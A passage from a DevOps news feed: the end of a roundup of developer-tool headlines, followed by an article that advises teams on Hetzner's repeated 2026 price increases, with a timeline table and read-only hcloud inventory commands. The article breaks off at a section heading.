        </h3><p>Learn what&#39;s new in Visual Studio Code 1.123 (Insiders) Read the full article</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_123"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-canonical-support-solves-hard-linux-performance-bugs-even-in-12-year-old-code" class="group relative scroll-mt-24">
        <a href="#h3-how-canonical-support-solves-hard-linux-performance-bugs-even-in-12-year-old-code" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How Canonical Support solves hard Linux performance bugs – even in 12-year old code
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-canonical-support-solves-hard-linux-performance-bugs-even-in-12-year-old-code"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A 12-year-old bug in libnss-db caused getent enumeration to slow to a crawl – and showed how far expert support can go when a customer brings the right evidence and the right question.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/support-solves-bugs-in-12-year-old-code"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-stop-pasting-tokens-oauth2-login-for-jetbrains-ide-plugins" class="group relative scroll-mt-24">
        <a href="#h3-stop-pasting-tokens-oauth2-login-for-jetbrains-ide-plugins" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Stop Pasting Tokens: OAuth2 Login for JetBrains IDE Plugins
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-stop-pasting-tokens-oauth2-login-for-jetbrains-ide-plugins"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The moment a plugin needs account data, a simple API call turns into an authentication problem. The bad shortcut is familiar: ask the user to create a personal access token (PAT), make them paste it i</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/platform/2026/06/stop-pasting-tokens-oauth2-login-for-jetbrains-ide-plugins/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-mellum2-goes-open-source-a-fast-model-for-ai-workflows" class="group relative scroll-mt-24">
        <a href="#h3-mellum2-goes-open-source-a-fast-model-for-ai-workflows" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Mellum2 Goes Open Source: A Fast Model for AI Workflows
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-mellum2-goes-open-source-a-fast-model-for-ai-workflows"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Trained from scratch and designed for practical deployment, Mellum2 is built for routing, Q&amp;A, sub-agents, and private AI use in software engineering systems. Today, we’re open-sourcing Mellum2, a 12B</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/ai/2026/06/mellum2-goes-open-source-a-fast-model-for-ai-workflows/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-xai-opens-grok-build-01-to-developers-via-api" class="group relative scroll-mt-24">
        <a href="#h3-xai-opens-grok-build-01-to-developers-via-api" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 xAI Opens Grok Build 0.1 to Developers via API
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-xai-opens-grok-build-01-to-developers-via-api"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>xAI&#39;s Grok Build 0.1 is now available in public beta via the xAI API — a fast, purpose-built coding model for agentic workflows, debugging, and MCP support.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/xai-opens-grok-build-0-1-to-developers-via-api/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-to-fix-common-typescript-issues-with-qodana" class="group relative scroll-mt-24">
        <a href="#h3-how-to-fix-common-typescript-issues-with-qodana" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How To Fix Common TypeScript Issues With Qodana
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-to-fix-common-typescript-issues-with-qodana"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Most TypeScript projects already run ESLint with @typescript-eslint. That covers a lot: explicit any, floating promises, non-null assertions, and more. If your linting setup is solid, you’re catching </p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/qodana/2026/06/fix-common-typescript-issues/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-claude-codes-dynamic-workflows-take-on-the-tasks-that-were-too-big-to-automate" class="group relative scroll-mt-24">
        <a href="#h3-claude-codes-dynamic-workflows-take-on-the-tasks-that-were-too-big-to-automate" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Claude Code’s Dynamic Workflows Take on the Tasks That Were Too Big to Automate
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-claude-codes-dynamic-workflows-take-on-the-tasks-that-were-too-big-to-automate"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Anthropic&#39;s Claude Code dynamic workflows run parallel subagents to tackle codebase-wide audits, large migrations, and complex engineering tasks end-to-end.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/claude-codes-dynamic-workflows-take-on-the-tasks-that-were-too-big-to-automate/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-microsoft-brings-mcp-to-geospatial-workflows-with-planetary-computer-pro-tools-for-vs-code" class="group relative scroll-mt-24">
        <a href="#h3-microsoft-brings-mcp-to-geospatial-workflows-with-planetary-computer-pro-tools-for-vs-code" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Microsoft Brings MCP to Geospatial Workflows With Planetary Computer Pro Tools for VS Code
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-microsoft-brings-mcp-to-geospatial-workflows-with-planetary-computer-pro-tools-for-vs-code"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Microsoft&#39;s Planetary Computer Pro MCP Tools for VS Code bring 35+ geospatial tools into GitHub Copilot via natural-language prompts.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/microsoft-brings-mcp-to-geospatial-workflows-with-planetary-computer-pro-tools-for-vs-code/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-ai-agent-workflows-on-ubuntu-with-the-new-nvidia-openshell-snap" class="group relative scroll-mt-24">
        <a href="#h3-securing-ai-agent-workflows-on-ubuntu-with-the-new-nvidia-openshell-snap" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing AI agent workflows on Ubuntu with the new NVIDIA OpenShell snap
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-securing-ai-agent-workflows-on-ubuntu-with-the-new-nvidia-openshell-snap"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>By packaging OpenShell as a snap, Canonical is enabling enterprises to confidently run next-generation agentic workflows across local devices, hybrid environments, and private clouds.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/nvidia-openshell-ubuntu-announcement"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gavriel-cohen-found-his-own-code-inside-openclaw-so-he-walked-away" class="group relative scroll-mt-24">
        <a href="#h3-gavriel-cohen-found-his-own-code-inside-openclaw-so-he-walked-away" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Gavriel Cohen found his own code inside OpenClaw, so he walked away
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gavriel-cohen-found-his-own-code-inside-openclaw-so-he-walked-away"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>When Gavriel Cohen first saw OpenClaw, he knew he wanted it. At the time, Cohen (soon to be the founder The post Gavriel Cohen found his own code inside OpenClaw, so he walked away appeared first on T</p>
<p><strong>📅 May 31, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/nanoclaw-openclaw-agent-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-retrieval-at-scale-is-becoming-a-systems-problem-not-a-tooling-problem" class="group relative scroll-mt-24">
        <a href="#h3-ai-retrieval-at-scale-is-becoming-a-systems-problem-not-a-tooling-problem" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI retrieval at scale is becoming a systems problem, not a tooling problem
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-retrieval-at-scale-is-becoming-a-systems-problem-not-a-tooling-problem"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI retrieval has moved well beyond embeddings and vector search. Early retrieval architectures focused primarily on semantic similarity. Still, production The post AI retrieval at scale is becoming a </p>
<p><strong>📅 May 31, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/ai-retrieval-at-scale/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-i-tested-cursors-new-jira-integration-and-its-5-stars-no-notes-heres-why" class="group relative scroll-mt-24">
        <a href="#h3-i-tested-cursors-new-jira-integration-and-its-5-stars-no-notes-heres-why" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 I tested Cursor’s new Jira integration and it’s 5 stars, no notes. Here’s why.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-i-tested-cursors-new-jira-integration-and-its-5-stars-no-notes-heres-why"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Cursor launched its Jira integration last week. The integration was marketed as simple: assign a ticket in Jira and Cursor The post I tested Cursor’s new Jira integration and it’s 5 stars, no notes. H</p>
<p><strong>📅 May 31, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/cursor-jira-integration-test/"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Hetzner's Third Price Increase in Three Months: What DevOps Teams Should Do]]></title>
      <link>https://devops-daily.com/posts/hetzner-price-increases-2026</link>
      <description><![CDATA[Hetzner is changing dedicated server and cloud pricing again on June 15, 2026. Here is what changed, why customers are frustrated, and how to decide whether to stay, resize, or move workloads.]]></description>
      <pubDate>Thu, 28 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/hetzner-price-increases-2026</guid>
      <category><![CDATA[FinOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[FinOps]]></category><category><![CDATA[Cloud]]></category><category><![CDATA[Hetzner]]></category><category><![CDATA[DigitalOcean]]></category><category><![CDATA[Cost Optimization]]></category><category><![CDATA[Infrastructure]]></category>
      <content:encoded><![CDATA[<p>Hetzner has announced another pricing change, effective June 15, 2026. For many teams, the headline is not just &quot;prices are going up.&quot; It is that this feels like the third Hetzner pricing shock in roughly three months, with the newest announcement landing before customers can see the final price table.</p>
<p>If you run production workloads on Hetzner, this is not a reason to panic migrate. It is a reason to get precise about exposure: which servers are protected by existing terms, which workloads need new capacity soon, and which systems could move without turning a pricing update into an outage.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Hetzner&#39;s <a href="https://www.hetzner.com/pressroom/standardization-and-price-adjustment-of-our-server-products/">May 27 announcement</a> says it is standardizing dedicated server products and increasing monthly prices for new orders. The changes take effect on June 15, 2026.</p>
<p>The operational takeaways:</p>
<ul>
<li>Existing rented servers keep their current terms for this adjustment.</li>
<li>New orders, rescales, and future products can be affected.</li>
<li>Dedicated servers and cloud plans at all locations are in scope.</li>
<li>Server Auction, IPs, storage products, Load Balancers, Volumes, Snapshots, Object Storage, web hosting, and managed servers are listed as not affected by this specific announcement.</li>
<li>Hetzner has not published the final new prices yet.</li>
<li>The Reddit reaction is mostly about repeated adjustments and unclear numbers, not just the existence of a price increase.</li>
</ul>
<p>The right move is to build a short exposure report before deciding anything. Stable existing servers may be fine. Workloads that need frequent resizing deserve a closer look.</p>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Before you make a provider decision, gather:</p>
<ul>
<li>A current list of Hetzner cloud servers, dedicated servers, and Server Auction machines</li>
<li>Monthly spend by product line, environment, and owner</li>
<li>Planned capacity changes for the next 30-90 days</li>
<li>A backup and restore status for every production datastore</li>
<li>DNS TTLs, load balancer dependencies, and IP allowlists</li>
<li>One realistic fallback provider for each workload class</li>
</ul>
<h2 id="h2-what-actually-changed" class="group relative scroll-mt-24">
        <a href="#h2-what-actually-changed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What Actually Changed
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-actually-changed"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Hetzner&#39;s May 27 announcement has two separate parts.</p>
<p>First, Hetzner is standardizing the dedicated server portfolio. New dedicated server models will use clearer suffixes such as <code>-1</code>, <code>-2</code>, and <code>-3</code>. A <code>-1-Ltd</code> suffix will mark limited-quantity servers built from lower-cost hardware components.</p>
<p>Second, Hetzner says monthly prices are increasing for new orders. The company points to hardware procurement pressure, especially the cost of server components. It also says setup fees will be reduced for most dedicated servers.</p>
<p>For operators, the most important scope detail is this: currently rented servers are not affected by this specific adjustment. New orders, rescales of existing servers, and future products under the new structure are affected.</p>
<p>That creates two very different situations:</p>
<ul>
<li>A stable dedicated server fleet may not see an immediate bill change.</li>
<li>A growing cloud or dedicated fleet can still be exposed as soon as it adds or rescales capacity.</li>
</ul>
<p>That distinction matters. &quot;Hetzner is raising prices&quot; is too vague to act on. &quot;Our CI runner fleet creates new cloud servers every week&quot; is actionable.</p>
<h2 id="h2-why-customers-are-frustrated" class="group relative scroll-mt-24">
        <a href="#h2-why-customers-are-frustrated" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why Customers Are Frustrated
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-customers-are-frustrated"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The Reddit thread titled <a href="https://www.reddit.com/r/hetzner/comments/1tpwusm/third_price_increase_in_three_months/">Third price increase in three months</a> is a good snapshot of the mood. Several comments focus on the same point: Hetzner announced another change, but the new prices are not visible yet.</p>
<p>That frustration did not come from nowhere. Hetzner&#39;s own pressroom shows a run of pricing-related updates in 2026:</p>
<table>
<thead>
<tr>
<th>Date</th>
<th>Hetzner communication</th>
<th>What changed</th>
</tr>
</thead>
<tbody><tr>
<td>February 2, 2026</td>
<td><a href="https://www.hetzner.com/pressroom/statement-setup-fees-adjustment/">Statement on the adjustment of setup fees</a></td>
<td>Hetzner said dedicated server setup fees were changing because RAM and NVMe SSD procurement costs had risen.</td>
</tr>
<tr>
<td>February 23, 2026</td>
<td><a href="https://www.hetzner.com/pressroom/statement-price-adjustment/">Statement on price adjustment as of April 1st 2026</a></td>
<td>Hetzner announced price changes for existing products and new orders effective April 1.</td>
</tr>
<tr>
<td>April 29, 2026</td>
<td><a href="https://www.hetzner.com/pressroom/statement-on%20the-latest-adjustment-to%20setup-fees/">Statement on the latest adjustment to setup fees</a></td>
<td>Hetzner adjusted dedicated server setup fees again.</td>
</tr>
<tr>
<td>May 27, 2026</td>
<td><a href="https://www.hetzner.com/pressroom/standardization-and-price-adjustment-of-our-server-products/">Standardization and price adjustment effective June 15, 2026</a></td>
<td>Hetzner announced the new product structure and monthly price increases for new orders and rescales.</td>
</tr>
</tbody></table>
<p>Depending on how you count setup fees versus monthly prices, people will debate whether this is the third or fourth adjustment. For planning, that debate is less important than the pattern: teams can no longer assume Hetzner pricing is static across the year.</p>
<h2 id="h2-the-risk-is-bigger-than-the-monthly-bill" class="group relative scroll-mt-24">
        <a href="#h2-the-risk-is-bigger-than-the-monthly-bill" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The Risk Is Bigger Than the Monthly Bill
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-risk-is-bigger-than-the-monthly-bill"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The obvious risk is a higher bill. The more useful question is whether the price change breaks an assumption in your infrastructure plan.</p>
<p>Examples:</p>
<ul>
<li>You planned to resize a database host after a traffic launch.</li>
<li>You rely on cheap ephemeral cloud workers for CI or batch jobs.</li>
<li>You sell hosting with thin margins and fixed customer pricing.</li>
<li>You keep extra capacity around because adding capacity has historically been cheap.</li>
<li>You assume Hetzner is always the cheapest acceptable provider, so no one has tested a fallback.</li>
</ul>
<p>Those are different problems. A stable server that keeps its terms needs documentation and monitoring. A workload that creates new machines every day needs a cost model.</p>
<h2 id="h2-build-an-exposure-report" class="group relative scroll-mt-24">
        <a href="#h2-build-an-exposure-report" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Build an Exposure Report
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-build-an-exposure-report"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Start with a small table. Do not try to solve the whole migration question in one meeting.</p>
<pre><code class="hljs language-text">Workload        Product type      Current state      Next resize?     Move difficulty
api-prod        Hetzner Cloud     existing           yes, 30 days     medium
postgres-prod   Dedicated AX      existing           no              high
ci-runners      Cloud             ephemeral          yes, weekly      low
object-store    Object Storage    existing           no              medium
staging         Cloud             existing           flexible        low
</code></pre><p>The useful column is <code>Next resize?</code>. Existing servers may be protected from this specific adjustment, but growth can still put you onto new pricing.</p>
<p>If you use the Hetzner Cloud CLI, export the current fleet first:</p>
<pre><code class="hljs language-bash">hcloud server list -o columns=<span class="hljs-built_in">id</span>,name,<span class="hljs-built_in">type</span>,location,status,ipv4
hcloud volume list -o columns=<span class="hljs-built_in">id</span>,name,size,location,server
hcloud load-balancer list -o columns=<span class="hljs-built_in">id</span>,name,<span class="hljs-built_in">type</span>,location
</code></pre><p>Then add the context the CLI cannot know:</p>
<ul>
<li>Who owns the workload?</li>
<li>Is it production, staging, CI, or batch?</li>
<li>Does it need new capacity before June 15?</li>
<li>Does it have tested backups?</li>
<li>Could it run somewhere else with only DNS and secret changes?</li>
</ul>
<p>This turns a provider announcement into a concrete task list.</p>
<h2 id="h2-decide-by-workload-class" class="group relative scroll-mt-24">
        <a href="#h2-decide-by-workload-class" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Decide by Workload Class
        </a>
        <button 
